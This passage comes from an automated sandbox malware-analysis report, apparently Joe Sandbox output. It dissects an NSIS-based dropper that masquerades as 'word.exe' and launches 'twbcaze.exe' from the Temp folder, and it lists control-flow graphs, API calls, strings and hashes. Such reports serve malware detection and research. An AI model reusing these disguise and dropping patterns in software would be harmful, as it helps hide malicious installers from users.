                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                          • String ID: $ /D=$ _?=$"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$nrdosueajqjitn Setup$~nsu
                                          • API String ID: 1031542678-394764541
                                          • Opcode ID: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                          • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                          • Opcode Fuzzy Hash: 8f74911709186bddaf2cccf0b89ea8509ed7bd73a7a07ba236b5c5ff12a0dd9f
                                          • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004054BD Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 376 4054bd-4054d8 call 40576c 379 4054f1-4054fb 376->379 380 4054da-4054ec DeleteFileA 376->380 382 4054fd-4054ff 379->382 383 40550f-40551d call 405b98 379->383 381 405685-405688 380->381 384 405630-405636 382->384 385 405505-405509 382->385 391 40552c-40552d call 4056d2 383->391 392 40551f-40552a lstrcatA 383->392 384->381 387 405638-40563b 384->387 385->383 385->384 389 405645-40564d call 405e93 387->389 390 40563d-405643 387->390 389->381 400 40564f-405664 call 40568b call 405850 RemoveDirectoryA 389->400 390->381 393 405532-405535 391->393 392->393 396 405540-405546 lstrcatA 393->396 397 405537-40553e 393->397 399 40554b-405569 lstrlenA FindFirstFileA 396->399 397->396 397->399 401 405626-40562a 399->401 402 40556f-405586 call 4056b6 399->402 412 405666-40566a 400->412 413 40567d-405680 call 404e84 400->413 401->384 404 40562c 401->404 410 405591-405594 402->410 411 405588-40558c 402->411 404->384 415 405596-40559b 410->415 416 4055a7-4055b5 call 405b98 410->416 411->410 414 40558e 411->414 412->390 418 40566c-40567b call 404e84 call 4058e6 412->418 413->381 414->410 420 405605-405617 FindNextFileA 415->420 421 40559d-40559f 415->421 426 4055b7-4055bf 416->426 427 4055cc-4055db call 405850 DeleteFileA 416->427 418->381 420->402 424 40561d-405620 FindClose 420->424 421->416 425 4055a1-4055a5 421->425 424->401 425->416 425->420 426->420 429 4055c1-4055ca call 4054bd 426->429 436 4055fd-405600 call 404e84 427->436 437 4055dd-4055e1 427->437 429->420 436->420 439 4055e3-4055f3 call 404e84 call 4058e6 437->439 440 4055f5-4055fb 437->440 439->420 440->420
                                          APIs
                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                          • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                          • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                          • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                          • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                          • FindClose.KERNELBASE(?), ref: 00405620
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nso8B21.tmp\*.*$C:\Users\user\AppData\Roaming\word.exe$\*.*
                                          • API String ID: 2035342205-3551532976
                                          • Opcode ID: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                          • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                          • Opcode Fuzzy Hash: 6e39d08db0da8798d4da0934d55880c8f60954caf57b81e1320f45a4632593a2
                                          • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004061D4 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 593 4061d4-4061d9 594 40624a-406268 593->594 595 4061db-40620a 593->595 598 406840-406855 594->598 596 406211-406215 595->596 597 40620c-40620f 595->597 602 406217-40621b 596->602 603 40621d 596->603 601 406221-406224 597->601 599 406857-40686d 598->599 600 40686f-406885 598->600 604 406888-40688f 599->604 600->604 605 406242-406245 601->605 606 406226-40622f 601->606 602->601 603->601 607 406891-406895 604->607 608 4068b6-4068c2 604->608 611 406417-406435 605->611 609 406231 606->609 610 406234-406240 606->610 612 406a44-406a4e 607->612 613 40689b-4068b3 607->613 622 406058-406061 608->622 609->610 617 4062aa-4062d8 610->617 614 406437-40644b 611->614 615 40644d-40645f 611->615 618 406a5a-406a6d 612->618 613->608 621 406462-40646c 614->621 615->621 619 4062f4-40630e 617->619 620 4062da-4062f2 617->620 623 406a72-406a76 618->623 624 406311-40631b 619->624 620->624 627 40646e 621->627 628 40640f-406415 621->628 625 406067 622->625 626 406a6f 622->626 630 406321 624->630 631 406292-406298 624->631 632 406113-406117 625->632 633 406183-406187 625->633 634 40606e-406072 625->634 635 4061ae-4061cf 625->635 626->623 636 4063ea-4063ee 627->636 637 40657f-40658c 627->637 628->611 629 4063b3-4063bd 628->629 638 406a02-406a0c 629->638 639 4063c3-4063e5 629->639 655 406277-40628f 630->655 656 4069de-4069e8 630->656 640 40634b-406351 631->640 641 40629e-4062a4 631->641 644 4069c3-4069cd 632->644 645 40611d-406136 632->645 648 4069d2-4069dc 633->648 649 40618d-4061a1 633->649 634->618 647 406078-406085 634->647 635->598 642 4063f4-40640c 636->642 643 4069f6-406a00 636->643 637->622 638->618 639->637 650 4063af 640->650 652 406353-406371 640->652 641->617 641->650 642->628 643->618 644->618 651 406139-40613d 645->651 647->626 653 40608b-4060d1 647->653 648->618 654 4061a4-4061ac 649->654 650->629 651->632 657 40613f-406145 651->657 658 406373-406387 652->658 659 406389-40639b 652->659 660 4060d3-4060d7 653->660 661 4060f9-4060fb 653->661 654->633 654->635 655->631 656->618 664 406147-40614e 657->664 665 40616f-406181 657->665 666 40639e-4063a8 658->666 659->666 667 4060e2-4060f0 GlobalAlloc 660->667 668 4060d9-4060dc GlobalFree 660->668 662 406109-406111 661->662 663 4060fd-406107 661->663 662->651 663->662 663->663 669 406150-406153 GlobalFree 664->669 670 406159-406169 GlobalAlloc 664->670 665->654 666->640 671 4063aa 666->671 667->626 672 4060f6 667->672 668->667 669->670 670->626 670->665 674 406330-406348 671->674 675 4069ea-4069f4 671->675 672->661 674->640 675->618
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                          • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                          • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                          • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405E93 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 738 405e93-405ea7 FindFirstFileA 739 405eb4 738->739 740 405ea9-405eb2 FindClose 738->740 741 405eb6-405eb7 739->741 740->741
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                          • FindClose.KERNEL32(00000000), ref: 00405EAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: C:\
                                          • API String ID: 2295610775-3404278061
                                          • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                          • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                          • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                          • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403981 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 132 403981-403993 133 403ad4-403ae3 132->133 134 403999-40399f 132->134 135 403b32-403b47 133->135 136 403ae5-403b2d GetDlgItem * 2 call 403e54 SetClassLongA call 40140b 133->136 134->133 137 4039a5-4039ae 134->137 139 403b87-403b8c call 403ea0 135->139 140 403b49-403b4c 135->140 136->135 141 4039b0-4039bd SetWindowPos 137->141 142 4039c3-4039c6 137->142 154 403b91-403bac 139->154 146 403b4e-403b59 call 401389 140->146 147 403b7f-403b81 140->147 141->142 143 4039e0-4039e6 142->143 144 4039c8-4039da ShowWindow 142->144 149 403a02-403a05 143->149 150 4039e8-4039fd DestroyWindow 143->150 144->143 146->147 168 403b5b-403b7a SendMessageA 146->168 147->139 153 403e21 147->153 158 403a07-403a13 SetWindowLongA 149->158 159 403a18-403a1e 149->159 156 403dfe-403e04 150->156 155 403e23-403e2a 153->155 161 403bb5-403bbb 154->161 162 403bae-403bb0 call 40140b 154->162 156->153 169 403e06-403e0c 156->169 158->155 166 403ac1-403acf call 403ebb 159->166 167 403a24-403a35 GetDlgItem 159->167 164 403bc1-403bcc 161->164 165 403ddf-403df8 DestroyWindow EndDialog 161->165 162->161 164->165 171 403bd2-403c1f call 405bba call 403e54 * 3 GetDlgItem 164->171 165->156 166->155 172 403a54-403a57 167->172 173 403a37-403a4e SendMessageA IsWindowEnabled 167->173 168->155 169->153 170 403e0e-403e17 ShowWindow 169->170 170->153 202 403c21-403c26 171->202 203 403c29-403c65 ShowWindow EnableWindow call 403e76 EnableWindow 171->203 176 403a59-403a5a 172->176 177 403a5c-403a5f 172->177 173->153 173->172 180 403a8a-403a8f call 403e2d 176->180 181 403a61-403a67 177->181 182 403a6d-403a72 177->182 180->166 185 403aa8-403abb SendMessageA 181->185 186 403a69-403a6b 181->186 182->185 187 403a74-403a7a 182->187 185->166 186->180 188 403a91-403a9a call 40140b 187->188 189 403a7c-403a82 call 40140b 187->189 188->166 199 403a9c-403aa6 188->199 198 403a88 189->198 198->180 199->198 202->203 206 403c67-403c68 203->206 207 403c6a 203->207 208 403c6c-403c9a GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403c9c-403cad SendMessageA 208->209 210 403caf 208->210 211 403cb5-403cee call 403e89 call 405b98 lstrlenA call 405bba SetWindowTextA call 401389 209->211 210->211 211->154 220 403cf4-403cf6 211->220 220->154 221 403cfc-403d00 220->221 222 403d02-403d08 221->222 223 403d1f-403d33 DestroyWindow 221->223 222->153 224 403d0e-403d14 222->224 223->156 225 403d39-403d66 CreateDialogParamA 223->225 224->154 226 403d1a 224->226 225->156 227 403d6c-403dc3 call 403e54 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->153 227->153 232 403dc5-403ddd ShowWindow call 403ea0 227->232 232->156
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                          • ShowWindow.USER32(?), ref: 004039DA
                                          • DestroyWindow.USER32 ref: 004039EE
                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                          • GetDlgItem.USER32(?,?), ref: 00403A2B
                                          • SendMessageA.USER32 ref: 00403A3F
                                          • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                          • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                          • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                          • SendMessageA.USER32 ref: 00403B69
                                          • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                          • ShowWindow.USER32(00000000,?), ref: 00403C30
                                          • EnableWindow.USER32(?,?), ref: 00403C42
                                          • EnableWindow.USER32(?,?), ref: 00403C5D
                                          • GetSystemMenu.USER32 ref: 00403C73
                                          • EnableMenuItem.USER32 ref: 00403C7A
                                          • SendMessageA.USER32 ref: 00403C92
                                          • SendMessageA.USER32 ref: 00403CA5
                                          • lstrlenA.KERNEL32(00420538,?,00420538,nrdosueajqjitn Setup), ref: 00403CCE
                                          • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                          • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                          • String ID: nrdosueajqjitn Setup
                                          • API String ID: 184305955-1765078079
                                          • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                          • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                          • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                          • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004035EB Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4035eb-403603 call 405f28 238 403605-403615 call 405af6 235->238 239 403617-40363e call 405a7f 235->239 248 403661-40368a call 4038b4 call 40576c 238->248 244 403640-403651 call 405a7f 239->244 245 403656-40365c lstrcatA 239->245 244->245 245->248 253 403690-403695 248->253 254 403711-403719 call 40576c 248->254 253->254 255 403697-4036bb call 405a7f 253->255 260 403727-40374c LoadImageA 254->260 261 40371b-403722 call 405bba 254->261 255->254 262 4036bd-4036bf 255->262 264 403752-403788 RegisterClassA 260->264 265 4037db-4037e3 call 40140b 260->265 261->260 266 4036d0-4036dc lstrlenA 262->266 267 4036c1-4036ce call 4056b6 262->267 268 4038aa 264->268 269 40378e-4037d6 SystemParametersInfoA CreateWindowExA 264->269 279 4037e5-4037e8 265->279 280 4037ed-4037f8 call 4038b4 265->280 273 403704-40370c call 40568b call 405b98 266->273 274 4036de-4036ec lstrcmpiA 266->274 267->266 272 4038ac-4038b3 268->272 269->265 273->254 274->273 278 4036ee-4036f8 GetFileAttributesA 274->278 283 4036fa-4036fc 278->283 284 4036fe-4036ff call 4056d2 278->284 279->272 288 403881-403889 call 404f56 280->288 289 4037fe-403818 ShowWindow call 405eba 280->289 283->273 283->284 284->273 294 4038a3-4038a5 call 40140b 288->294 295 40388b-403891 288->295 296 403824-403836 GetClassInfoA 289->296 297 40381a-40381f call 405eba 289->297 294->268 295->279 298 403897-40389e call 40140b 295->298 301 403838-403848 GetClassInfoA RegisterClassA 296->301 302 40384e-403871 DialogBoxParamA call 40140b 296->302 297->296 298->279 301->302 306 403876-40387f call 40353b 302->306 306->272
                                          APIs
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 0040365C
                                          • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                          • lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                          • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 004036EF
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                            • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                          • RegisterClassA.USER32 ref: 0040377F
                                          • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                          • CreateWindowExA.USER32 ref: 004037D0
                                          • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                          • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                          • RegisterClassA.USER32(004236E0), ref: 00403848
                                          • DialogBoxParamA.USER32 ref: 00403867
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                          • API String ID: 1975747703-2232938697
                                          • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                          • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                          • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                          • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402C55 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40586f 312 402ca5-402caa 309->312 313 402caf-402cdd call 405b98 call 4056d2 call 405b98 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 323 402ce8-402cff 321->323 329 402dda-402ddd 322->329 330 402e2d-402e32 322->330 325 402d01 323->325 326 402d03-402d05 call 403081 323->326 325->326 333 402d0a-402d0c 326->333 331 402e01-402e2b GlobalAlloc call 4030b3 call 402e8e 329->331 332 402ddf-402df0 call 4030b3 call 403081 329->332 330->314 331->330 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 339 402d95-402d99 335->339 340 402d1b-402d2f call 405830 335->340 336->330 344 402da3-402da9 339->344 345 402d9b-402da2 call 402bf1 339->345 340->344 358 402d31-402d38 340->358 351 402db8-402dc2 344->351 352 402dab-402db5 call 405f97 344->352 345->344 349->330 355 402df9-402dff 349->355 351->323 359 402dc8 351->359 352->351 355->330 355->331 358->344 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->344 366 402d43-402d4a 364->366 365->365 367 402e65-402e80 SetFilePointer call 405830 365->367 366->344 368 402d4c-402d53 366->368 371 402e85 367->371 368->344 370 402d55-402d75 368->370 370->330 372 402d7b-402d7f 370->372 371->314 373 402d81-402d85 372->373 374 402d87-402d8f 372->374 373->359 373->374 374->344 375 402d91-402d93 374->375 375->344
                                          APIs
                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402C82
                                            • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                            • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                          • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                          • API String ID: 4283519449-2207440701
                                          • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
